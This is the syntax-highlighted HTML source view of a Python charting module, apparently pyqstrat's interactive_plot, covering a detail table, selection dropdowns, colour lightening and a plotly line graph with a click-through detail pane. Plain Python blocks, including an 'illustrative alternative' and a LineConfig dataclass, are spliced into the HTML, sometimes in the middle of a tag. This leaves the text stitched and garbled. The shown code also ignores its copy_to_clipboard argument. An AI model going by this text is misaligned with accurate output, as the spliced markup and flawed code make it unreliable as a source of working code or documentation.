class=\"p\">:</span> <span class=\"nb\">str</span> <span class=\"o\">=</span> <span class=\"s1\">&#39;</span><span class=\"si\">{:.4g}</span><span class=\"s1\">&#39;</span><span class=\"p\">,</span> \n <span class=\"n\">min_rows</span><span class=\"p\">:</span> <span class=\"nb\">int</span> <span class=\"o\">=</span> <span class=\"mi\">100</span><span class=\"p\">,</span> \n <span class=\"n\">copy_to_clipboard</span><span class=\"p\">:</span> <span class=\"nb\">bool</span> <span class=\"o\">=</span> <span class=\"kc\">True</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"kc\">None</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Args:</span>\n<span class=\"sd\"> colnames: list of column names to display. If None we display all columns. Default None</span>\n<span class=\"sd\"> float_format: Format for each floating point column. Default {:.4g}</span>\n<span class=\"sd\"> min_rows: Do not truncate the display of the table before this many rows. Default 100</span>\n<span class=\"sd\"> copy_to_clipboard: If set, we copy the dataframe to the clipboard. 
On linux, you must install xclip for this to work</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">colnames</span> <span class=\"o\">=</span> <span class=\"n\">colnames</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">float_format</span> <span class=\"o\">=</span> <span class=\"n\">float_format</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">min_rows</span> <span class=\"o\">=</span> <span class=\"n\">min_rows</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">copy_to_clipboard</span> <span class=\"o\">=</span> <span class=\"kc\">True</span></div>\n \n<div class=\"viewcode-block\" id=\"SimpleDetailTable.__call__\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.interactive_plot.SimpleDetailTable.__call__\">[docs]</a> <span class=\"k\">def</span> <span class=\"fm\">__call__</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> <span class=\"n\">detail_widget</span><span class=\"p\">:</span> <span class=\"n\">widgets</span><span class=\"o\">.</span><span class=\"n\">Widget</span><span class=\"p\">,</span> <span class=\"n\">data</span><span class=\"p\">:</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"p\">,</span> <span class=\"n\">debug</span><span class=\"o\">=</span><span class=\"kc\">False</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"kc\">None</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Args:</span>\n<span class=\"sd\"> detail_widget: The widget to display the data in</span>\n<span class=\"sd\"> data: The dataframe to display</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"k\">if</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">float_format</span><span class=\"p\">:</span>\n <span class=\"n\">orig_float_format</span> <span class=\"o\">=</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">options</span><span class=\"o\">.</span><span class=\"n\">display</span><span class=\"o\">.</span><span class=\"n\">float_format</span>\n <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">options</span><span class=\"o\">.</span><span class=\"n\">display</span><span class=\"o\">.</span><span class=\"n\">float_format</span> <span class=\"o\">=</span> <span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">float_format</span><span class=\"p\">)</span><span class=\"o\">.</span><span class=\"n\">format</span>\n \n <span class=\"k\">if</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">min_rows</span><span class=\"p\">:</span>\n <span class=\"n\">orig_min_rows</span> <span class=\"o\">=</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">options</span><span class=\"o\">.</span><span class=\"n\">display</span><span class=\"o\">.</span><span class=\"n\">min_rows</span>\n <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">options</span><span class=\"o\">.</span><span class=\"n\">display</span><span class=\"o\">.</span><span class=\"n\">min_rows</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">min_rows</span>\n \n <span class=\"k\">with</span> <span 
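
# Illustrative alternative (not part of the original module): pd.option_context
# can replace the manual save/restore above, and it restores the display
# options even if display() raises.
def _example_option_context(data: pd.DataFrame) -> None:
    with pd.option_context('display.float_format', '{:.4g}'.format,
                           'display.min_rows', 100):
        display(data)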
class=\"n\">detail_widget</span><span class=\"p\">:</span>\n <span class=\"k\">if</span> <span class=\"ow\">not</span> <span class=\"n\">debug</span><span class=\"p\">:</span> <span class=\"n\">clear_output</span><span class=\"p\">()</span>\n <span class=\"k\">if</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">colnames</span><span class=\"p\">:</span> <span class=\"n\">data</span> <span class=\"o\">=</span> <span class=\"n\">data</span><span class=\"p\">[</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">colnames</span><span class=\"p\">]</span>\n <span class=\"n\">data</span> <span class=\"o\">=</span> <span class=\"n\">data</span><span class=\"o\">.</span><span class=\"n\">reset_index</span><span class=\"p\">(</span><span class=\"n\">drop</span><span class=\"o\">=</span><span class=\"kc\">True</span><span class=\"p\">)</span>\n <span class=\"n\">display</span><span class=\"p\">(</span><span class=\"n\">data</span><span class=\"p\">)</span>\n <span class=\"k\">if</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">copy_to_clipboard</span><span class=\"p\">:</span> <span class=\"n\">data</span><span class=\"o\">.</span><span class=\"n\">to_clipboard</span><span class=\"p\">(</span><span class=\"n\">index</span><span class=\"o\">=</span><span class=\"kc\">False</span><span class=\"p\">)</span>\n \n <span class=\"k\">if</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">float_format</span><span class=\"p\">:</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">options</span><span class=\"o\">.</span><span class=\"n\">display</span><span class=\"o\">.</span><span class=\"n\">float_format</span> <span class=\"o\">=</span> <span class=\"n\">orig_float_format</span>\n <span class=\"k\">if</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">min_rows</span><span class=\"p\">:</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">options</span><span class=\"o\">.</span><span class=\"n\">display</span><span class=\"o\">.</span><span class=\"n\">min_rows</span> <span class=\"o\">=</span> <span class=\"n\">orig_min_rows</span></div></div>\n \n \n<div class=\"viewcode-block\" id=\"create_selection_dropdowns\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.interactive_plot.create_selection_dropdowns\">[docs]</a><span class=\"k\">def</span> <span class=\"nf\">create_selection_dropdowns</span><span class=\"p\">(</span><span class=\"n\">dims</span><span class=\"p\">:</span> <span class=\"nb\">dict</span><span class=\"p\">[</span><span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"nb\">str</span><span class=\"p\">],</span> <span class=\"n\">labels</span><span class=\"p\">:</span> <span class=\"nb\">dict</span><span class=\"p\">[</span><span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"nb\">str</span><span class=\"p\">],</span> <span class=\"n\">update_form_func</span><span class=\"p\">:</span> <span class=\"n\">UpdateFormFuncType</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"nb\">dict</span><span class=\"p\">[</span><span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"n\">Any</span><span class=\"p\">]:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Create a list of selection widgets</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"n\">selection_widgets</span><span 
class=\"p\">:</span> <span class=\"nb\">dict</span><span class=\"p\">[</span><span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"n\">widgets</span><span class=\"o\">.</span><span class=\"n\">Widget</span><span class=\"p\">]</span> <span class=\"o\">=</span> <span class=\"p\">{}</span>\n <span class=\"k\">for</span> <span class=\"n\">name</span> <span class=\"ow\">in</span> <span class=\"n\">dims</span><span class=\"o\">.</span><span class=\"n\">keys</span><span class=\"p\">():</span>\n <span class=\"n\">label</span> <span class=\"o\">=</span> <span class=\"n\">labels</span><span class=\"p\">[</span><span class=\"n\">name</span><span class=\"p\">]</span> <span class=\"k\">if</span> <span class=\"n\">name</span> <span class=\"ow\">in</span> <span class=\"n\">labels</span> <span class=\"k\">else</span> <span class=\"n\">name</span>\n <span class=\"n\">widget</span> <span class=\"o\">=</span> <span class=\"n\">widgets</span><span class=\"o\">.</span><span class=\"n\">Dropdown</span><span class=\"p\">(</span><span class=\"n\">description</span><span class=\"o\">=</span><span class=\"n\">label</span><span class=\"p\">,</span> <span class=\"n\">style</span><span class=\"o\">=</span><span class=\"p\">{</span><span class=\"s1\">&#39;description_width&#39;</span><span class=\"p\">:</span> <span class=\"s1\">&#39;initial&#39;</span><span class=\"p\">})</span>\n <span class=\"n\">selection_widgets</span><span class=\"p\">[</span><span class=\"n\">name</span><span class=\"p\">]</span> <span class=\"o\">=</span> <span class=\"n\">widget</span>\n \n <span class=\"k\">for</span> <span class=\"n\">widget</span> <span class=\"ow\">in</span> <span class=\"n\">selection_widgets</span><span class=\"o\">.</span><span class=\"n\">values</span><span class=\"p\">():</span>\n <span class=\"n\">widget</span><span class=\"o\">.</span><span class=\"n\">observe</span><span class=\"p\">(</span><span class=\"k\">lambda</span> <span class=\"n\">x</span><span class=\"p\">:</span> <span class=\"n\">on_widgets_updated</span><span class=\"p\">(</span><span class=\"n\">x</span><span class=\"p\">,</span> <span class=\"n\">update_form_func</span><span class=\"p\">,</span> <span class=\"n\">selection_widgets</span><span class=\"p\">),</span> <span class=\"n\">names</span><span class=\"o\">=</span><span class=\"s1\">&#39;value&#39;</span><span class=\"p\">)</span>\n\n <span class=\"k\">return</span> <span class=\"n\">selection_widgets</span></div>\n\n\n<div class=\"viewcode-block\" id=\"on_widgets_updated\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.interactive_plot.on_widgets_updated\">[docs]</a><span class=\"k\">def</span> <span class=\"nf\">on_widgets_updated</span><span class=\"p\">(</span><span class=\"n\">change</span><span class=\"p\">:</span> <span class=\"n\">traitlets</span><span class=\"o\">.</span><span class=\"n\">utils</span><span class=\"o\">.</span><span class=\"n\">bunch</span><span class=\"o\">.</span><span class=\"n\">Bunch</span><span class=\"p\">,</span> <span class=\"n\">update_form_func</span><span class=\"p\">,</span> <span class=\"n\">selection_widgets</span><span class=\"p\">:</span> <span class=\"nb\">dict</span><span class=\"p\">[</span><span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"n\">widgets</span><span class=\"o\">.</span><span class=\"n\">Widget</span><span class=\"p\">])</span> <span class=\"o\">-&gt;</span> <span class=\"kc\">None</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Callback 

@dataclass
class LineConfig:
    color: str | None = None
    thickness: float = math.nan
    secondary_y: bool = False
    marker_mode: str = 'lines+markers'
    show_detail: bool = True
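
# Illustrative sketch: configuring the series whose zvalue is 'P' to draw in
# red, without markers, on a secondary y axis. The key 'P' is hypothetical.
def _example_line_configs() -> dict[str, LineConfig]:
    return {'P': LineConfig(color='red', marker_mode='lines', secondary_y=True)}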
class=\"p\">(</span><span class=\"s1\">&#39;,&#39;</span><span class=\"p\">)</span>\n <span class=\"n\">r</span><span class=\"p\">,</span> <span class=\"n\">g</span><span class=\"p\">,</span> <span class=\"n\">b</span> <span class=\"o\">=</span> <span class=\"nb\">int</span><span class=\"p\">(</span><span class=\"n\">s</span><span class=\"p\">[</span><span class=\"mi\">0</span><span class=\"p\">]),</span> <span class=\"nb\">int</span><span class=\"p\">(</span><span class=\"n\">s</span><span class=\"p\">[</span><span class=\"mi\">1</span><span class=\"p\">]),</span> <span class=\"nb\">int</span><span class=\"p\">(</span><span class=\"n\">s</span><span class=\"p\">[</span><span class=\"mi\">2</span><span class=\"p\">])</span>\n <span class=\"k\">return</span> <span class=\"n\">r</span><span class=\"p\">,</span> <span class=\"n\">g</span><span class=\"p\">,</span> <span class=\"n\">b</span>\n\n \n<span class=\"k\">def</span> <span class=\"nf\">_lighten_color</span><span class=\"p\">(</span><span class=\"n\">r</span><span class=\"p\">:</span> <span class=\"nb\">int</span><span class=\"p\">,</span> <span class=\"n\">g</span><span class=\"p\">:</span> <span class=\"nb\">int</span><span class=\"p\">,</span> <span class=\"n\">b</span><span class=\"p\">:</span> <span class=\"nb\">int</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"nb\">tuple</span><span class=\"p\">[</span><span class=\"nb\">int</span><span class=\"p\">,</span> <span class=\"nb\">int</span><span class=\"p\">,</span> <span class=\"nb\">int</span><span class=\"p\">]:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Lighten color so we can show confidence intervals in a lighter shade than the line itself</span>\n<span class=\"sd\"> We convert to hls and increase lightness and decrease saturation</span>\n<span class=\"sd\"> &gt;&gt;&gt; assert _lighten_color(31, 119, 180) == (102, 168, 214)</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"n\">hls</span> <span class=\"o\">=</span> <span class=\"n\">colorsys</span><span class=\"o\">.</span><span class=\"n\">rgb_to_hls</span><span class=\"p\">(</span><span class=\"n\">r</span><span class=\"p\">,</span> <span class=\"n\">g</span><span class=\"p\">,</span> <span class=\"n\">b</span><span class=\"p\">)</span>\n <span class=\"n\">light_hls</span> <span class=\"o\">=</span> <span class=\"p\">(</span><span class=\"n\">hls</span><span class=\"p\">[</span><span class=\"mi\">0</span><span class=\"p\">],</span> <span class=\"n\">hls</span><span class=\"p\">[</span><span class=\"mi\">1</span><span class=\"p\">]</span> <span class=\"o\">*</span> <span class=\"mf\">1.5</span><span class=\"p\">,</span> <span class=\"n\">hls</span><span class=\"p\">[</span><span class=\"mi\">2</span><span class=\"p\">]</span> <span class=\"o\">*</span> <span class=\"mf\">0.5</span><span class=\"p\">)</span>\n <span class=\"n\">rgb</span> <span class=\"o\">=</span> <span class=\"n\">colorsys</span><span class=\"o\">.</span><span class=\"n\">hls_to_rgb</span><span class=\"p\">(</span><span class=\"o\">*</span><span class=\"n\">light_hls</span><span class=\"p\">)</span>\n <span class=\"n\">rgb</span> <span class=\"o\">=</span> <span class=\"p\">(</span><span class=\"nb\">int</span><span class=\"p\">(</span><span class=\"nb\">round</span><span class=\"p\">(</span><span class=\"n\">rgb</span><span class=\"p\">[</span><span class=\"mi\">0</span><span class=\"p\">])),</span> <span class=\"nb\">int</span><span class=\"p\">(</span><span 
class=\"nb\">round</span><span class=\"p\">(</span><span class=\"n\">rgb</span><span class=\"p\">[</span><span class=\"mi\">1</span><span class=\"p\">])),</span> <span class=\"nb\">int</span><span class=\"p\">(</span><span class=\"nb\">round</span><span class=\"p\">(</span><span class=\"n\">rgb</span><span class=\"p\">[</span><span class=\"mi\">2</span><span class=\"p\">])))</span>\n <span class=\"k\">return</span> <span class=\"n\">rgb</span>\n\n\n<div class=\"viewcode-block\" id=\"foo\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.interactive_plot.foo\">[docs]</a><span class=\"k\">def</span> <span class=\"nf\">foo</span><span class=\"p\">(</span><span class=\"n\">name</span><span class=\"p\">,</span> <span class=\"n\">old</span><span class=\"p\">,</span> <span class=\"n\">new</span><span class=\"p\">):</span>\n <span class=\"kn\">import</span> <span class=\"nn\">datetime</span>\n <span class=\"nb\">print</span><span class=\"p\">(</span><span class=\"sa\">f</span><span class=\"s1\">&#39;hello: </span><span class=\"si\">{</span><span class=\"n\">datetime</span><span class=\"o\">.</span><span class=\"n\">datetime</span><span class=\"o\">.</span><span class=\"n\">now</span><span class=\"p\">()</span><span class=\"si\">}</span><span class=\"s1\"> </span><span class=\"si\">{</span><span class=\"n\">name</span><span class=\"si\">}</span><span class=\"s1\"> </span><span class=\"si\">{</span><span class=\"n\">old</span><span class=\"si\">}</span><span class=\"s1\"> </span><span class=\"si\">{</span><span class=\"n\">new</span><span class=\"si\">}</span><span class=\"s1\">&#39;</span><span class=\"p\">)</span></div>\n \n \n<div class=\"viewcode-block\" id=\"LineGraphWithDetailDisplay\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.interactive_plot.LineGraphWithDetailDisplay\">[docs]</a><span class=\"k\">class</span> <span class=\"nc\">LineGraphWithDetailDisplay</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Draws line graphs and also includes a detail pane.</span>\n<span class=\"sd\"> When you click on a point on the line graph, the detail pane shows the data used to compute that point.</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n \n<div class=\"viewcode-block\" id=\"LineGraphWithDetailDisplay.__init__\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.interactive_plot.LineGraphWithDetailDisplay.__init__\">[docs]</a> <span class=\"k\">def</span> <span class=\"fm\">__init__</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> \n <span class=\"n\">display_detail_func</span><span class=\"p\">:</span> <span class=\"n\">DetailDisplayType</span> <span class=\"o\">=</span> <span class=\"n\">SimpleDetailTable</span><span class=\"p\">(),</span> \n <span class=\"n\">line_configs</span><span class=\"p\">:</span> <span class=\"nb\">dict</span><span class=\"p\">[</span><span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"n\">LineConfig</span><span class=\"p\">]</span> <span class=\"o\">=</span> <span class=\"p\">{},</span> \n <span class=\"n\">title</span><span class=\"p\">:</span> <span class=\"nb\">str</span> <span class=\"o\">|</span> <span class=\"kc\">None</span> <span class=\"o\">=</span> <span class=\"kc\">None</span><span class=\"p\">,</span> \n <span class=\"n\">hovertemplate</span><span class=\"p\">:</span> <span class=\"nb\">str</span> <span class=\"o\">|</span> <span class=\"kc\">None</span> <span class=\"o\">=</span> <span 
class=\"kc\">None</span><span class=\"p\">,</span> \n <span class=\"n\">debug</span><span class=\"o\">=</span><span class=\"kc\">False</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"kc\">None</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Args:</span>\n<span class=\"sd\"> display_detail_func: A function that displays the data on the detail pane. Default SimpleDetailTable</span>\n<span class=\"sd\"> line_configs: Configuration of each line. The key in this dict is the zvalue for that line. Default {}</span>\n<span class=\"sd\"> title: Title of the graph. Default None</span>\n<span class=\"sd\"> hovertemplate: What to display when we hover over a point on the graph. See plotly hovertemplate</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">display_detail_func</span> <span class=\"o\">=</span> <span class=\"n\">display_detail_func</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">line_configs</span> <span class=\"o\">=</span> <span class=\"n\">line_configs</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">title</span> <span class=\"o\">=</span> <span class=\"n\">title</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">hovertemplate</span> <span class=\"o\">=</span> <span class=\"n\">hovertemplate</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">debug</span> <span class=\"o\">=</span> <span class=\"n\">debug</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">default_line_config</span> <span class=\"o\">=</span> <span class=\"n\">LineConfig</span><span class=\"p\">()</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">detail_data</span><span class=\"p\">:</span> <span class=\"nb\">dict</span><span class=\"p\">[</span><span class=\"n\">Any</span><span class=\"p\">,</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"p\">]</span> <span class=\"o\">=</span> <span class=\"p\">{}</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">xcol</span> <span class=\"o\">=</span> <span class=\"s1\">&#39;&#39;</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">zvalues</span><span class=\"p\">:</span> <span class=\"nb\">dict</span><span class=\"p\">[</span><span class=\"nb\">int</span><span class=\"p\">,</span> <span class=\"n\">Any</span><span class=\"p\">]</span> <span class=\"o\">=</span> <span class=\"p\">{}</span> <span class=\"c1\"># trace index by zvalue</span></div>\n \n<div class=\"viewcode-block\" id=\"LineGraphWithDetailDisplay.__call__\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.interactive_plot.LineGraphWithDetailDisplay.__call__\">[docs]</a> <span class=\"k\">def</span> <span class=\"fm\">__call__</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> <span class=\"n\">xaxis_title</span><span class=\"p\">:</span> <span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"n\">yaxis_title</span><span class=\"p\">:</span> <span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"n\">line_data</span><span class=\"p\">:</span> <span class=\"nb\">list</span><span class=\"p\">[</span><span class=\"n\">LineDataType</span><span class=\"p\">])</span> <span 
class=\"o\">-&gt;</span> <span class=\"nb\">list</span><span class=\"p\">[</span><span class=\"n\">widgets</span><span class=\"o\">.</span><span class=\"n\">Widget</span><span class=\"p\">]:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Draw the plot and also set it up so if you click on a point, we display the data used to compute that point.</span>\n<span class=\"sd\"> Args:</span>\n<span class=\"sd\"> line_data: The zvalue, plot data, and detail data for each line to draw. The plot data must have </span>\n<span class=\"sd\"> x as the first column and y as the second column</span>\n<span class=\"sd\"> Return:</span>\n<span class=\"sd\"> A list of widgets to draw. In this case, a figure widget and a output widget which contains the detail display</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"k\">if</span> <span class=\"ow\">not</span> <span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">line_data</span><span class=\"p\">):</span> <span class=\"k\">return</span> <span class=\"p\">[]</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">detail_data</span><span class=\"o\">.</span><span class=\"n\">clear</span><span class=\"p\">()</span>\n <span class=\"n\">secondary_y</span> <span class=\"o\">=</span> <span class=\"nb\">any</span><span class=\"p\">([</span><span class=\"n\">lc</span><span class=\"o\">.</span><span class=\"n\">secondary_y</span> <span class=\"k\">for</span> <span class=\"n\">lc</span> <span class=\"ow\">in</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">line_configs</span><span class=\"o\">.</span><span class=\"n\">values</span><span class=\"p\">()])</span>\n \n <span class=\"n\">fig_widget</span> <span class=\"o\">=</span> <span class=\"n\">go</span><span class=\"o\">.</span><span class=\"n\">FigureWidget</span><span class=\"p\">(</span><span class=\"n\">make_subplots</span><span class=\"p\">(</span><span class=\"n\">specs</span><span class=\"o\">=</span><span class=\"p\">[[{</span><span class=\"s2\">&quot;secondary_y&quot;</span><span class=\"p\">:</span> <span class=\"n\">secondary_y</span><span class=\"p\">}]]))</span>\n <span class=\"c1\"># fig_widget.on_trait_change(foo, &#39;_js2py_restyle&#39;)</span>\n <span class=\"c1\"># fig_widget.on_trait_change()</span>\n <span class=\"n\">detail_widget</span> <span class=\"o\">=</span> <span class=\"n\">widgets</span><span class=\"o\">.</span><span class=\"n\">Output</span><span class=\"p\">()</span>\n \n <span class=\"n\">trace_num</span> <span class=\"o\">=</span> <span class=\"mi\">0</span>\n\n <span class=\"k\">for</span> <span class=\"n\">line_num</span><span class=\"p\">,</span> <span class=\"p\">(</span><span class=\"n\">zvalue</span><span class=\"p\">,</span> <span class=\"n\">line_df</span><span class=\"p\">,</span> <span class=\"n\">_detail_data</span><span class=\"p\">)</span> <span class=\"ow\">in</span> <span class=\"nb\">enumerate</span><span class=\"p\">(</span><span class=\"n\">line_data</span><span class=\"p\">):</span>\n <span class=\"n\">x</span> <span class=\"o\">=</span> <span class=\"n\">line_df</span><span class=\"o\">.</span><span class=\"n\">iloc</span><span class=\"p\">[:,</span> <span class=\"mi\">0</span><span class=\"p\">]</span><span class=\"o\">.</span><span class=\"n\">values</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">xcol</span> <span class=\"o\">=</span> <span class=\"n\">line_df</span><span class=\"o\">.</span><span 
class=\"n\">columns</span><span class=\"p\">[</span><span class=\"mi\">0</span><span class=\"p\">]</span>\n <span class=\"n\">y</span> <span class=\"o\">=</span> <span class=\"n\">line_df</span><span class=\"o\">.</span><span class=\"n\">iloc</span><span class=\"p\">[:,</span> <span class=\"mi\">1</span><span class=\"p\">]</span><span class=\"o\">.</span><span class=\"n\">values</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">detail_data</span><span class=\"p\">[</span><span class=\"n\">zvalue</span><span class=\"p\">]</span> <span class=\"o\">=</span> <span class=\"n\">_detail_data</span>\n <span class=\"n\">line_config</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">line_configs</span><span class=\"p\">[</span><span class=\"n\">zvalue</span><span class=\"p\">]</span> <span class=\"k\">if</span> <span class=\"n\">zvalue</span> <span class=\"ow\">in</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">line_configs</span> <span class=\"k\">else</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">default_line_config</span>\n <span class=\"n\">marker_mode</span> <span class=\"o\">=</span> <span class=\"n\">line_config</span><span class=\"o\">.</span><span class=\"n\">marker_mode</span>\n <span class=\"n\">color</span> <span class=\"o\">=</span> <span class=\"n\">line_config</span><span class=\"o\">.</span><span class=\"n\">color</span> <span class=\"k\">if</span> <span class=\"n\">line_config</span><span class=\"o\">.</span><span class=\"n\">color</span> <span class=\"k\">else</span> <span class=\"n\">DEFAULT_PLOTLY_COLORS</span><span class=\"p\">[</span><span class=\"n\">line_num</span><span class=\"p\">]</span>\n \n <span class=\"n\">hovertemplate</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">hovertemplate</span>\n <span class=\"n\">customdata</span> <span class=\"o\">=</span> <span class=\"kc\">None</span>\n \n <span class=\"k\">if</span> <span class=\"n\">hovertemplate</span> <span class=\"ow\">is</span> <span class=\"kc\">None</span><span class=\"p\">:</span>\n <span class=\"n\">unique</span><span class=\"p\">,</span> <span class=\"n\">counts</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">unique</span><span class=\"p\">(</span><span class=\"n\">_detail_data</span><span class=\"p\">[</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">xcol</span><span class=\"p\">]</span><span class=\"o\">.</span><span class=\"n\">values</span><span class=\"p\">,</span> <span class=\"n\">return_counts</span><span class=\"o\">=</span><span class=\"kc\">True</span><span class=\"p\">)</span>\n <span class=\"n\">customdata</span> <span class=\"o\">=</span> <span class=\"n\">counts</span><span class=\"p\">[</span><span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">searchsorted</span><span class=\"p\">(</span><span class=\"n\">unique</span><span class=\"p\">,</span> <span class=\"n\">x</span><span class=\"p\">)]</span>\n <span class=\"n\">hovertemplate</span> <span class=\"o\">=</span> <span class=\"s1\">&#39;N: %</span><span class=\"si\">{customdata}</span><span class=\"s1\">&#39;</span> <span class=\"c1\"># number of entries used to compute each x</span>\n <span class=\"n\">hovertemplate</span> <span class=\"o\">+=</span> <span class=\"sa\">f</span><span class=\"s1\">&#39; Series: </span><span 
class=\"si\">{</span><span class=\"n\">zvalue</span><span class=\"si\">}</span><span class=\"s1\"> </span><span class=\"si\">{</span><span class=\"n\">xaxis_title</span><span class=\"si\">}</span><span class=\"s1\">: &#39;</span> <span class=\"o\">+</span> <span class=\"s1\">&#39;%</span><span class=\"si\">{x:.4g}</span><span class=\"s1\"> &#39;</span> <span class=\"o\">+</span> <span class=\"sa\">f</span><span class=\"s1\">&#39;</span><span class=\"si\">{</span><span class=\"n\">yaxis_title</span><span class=\"si\">}</span><span class=\"s1\">: &#39;</span> <span class=\"o\">+</span> <span class=\"s1\">&#39;%</span><span class=\"si\">{y:.4g}</span><span class=\"s1\">&#39;</span>\n \n <span class=\"n\">trace</span> <span class=\"o\">=</span> <span class=\"n\">go</span><span class=\"o\">.</span><span class=\"n\">Scatter</span><span class=\"p\">(</span>\n <span class=\"n\">x</span><span class=\"o\">=</span><span class=\"n\">x</span><span class=\"p\">,</span>\n <span class=\"n\">y</span><span class=\"o\">=</span><span class=\"n\">y</span><span class=\"p\">,</span>\n <span class=\"n\">customdata</span><span class=\"o\">=</span><span class=\"n\">customdata</span><span class=\"p\">,</span>\n <span class=\"n\">mode</span><span class=\"o\">=</span><span class=\"n\">marker_mode</span><span class=\"p\">,</span>\n <span class=\"n\">name</span><span class=\"o\">=</span><span class=\"nb\">str</span><span class=\"p\">(</span><span class=\"n\">zvalue</span><span class=\"p\">),</span>\n <span class=\"n\">line</span><span class=\"o\">=</span><span class=\"nb\">dict</span><span class=\"p\">(</span><span class=\"n\">color</span><span class=\"o\">=</span><span class=\"n\">color</span><span class=\"p\">),</span>\n <span class=\"n\">hovertemplate</span><span class=\"o\">=</span><span class=\"n\">hovertemplate</span> \n <span class=\"p\">)</span>\n \n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">zvalues</span><span class=\"p\">[</span><span class=\"n\">trace_num</span><span class=\"p\">]</span> <span class=\"o\">=</span> <span class=\"n\">zvalue</span>\n \n <span class=\"n\">fig_widget</span><span 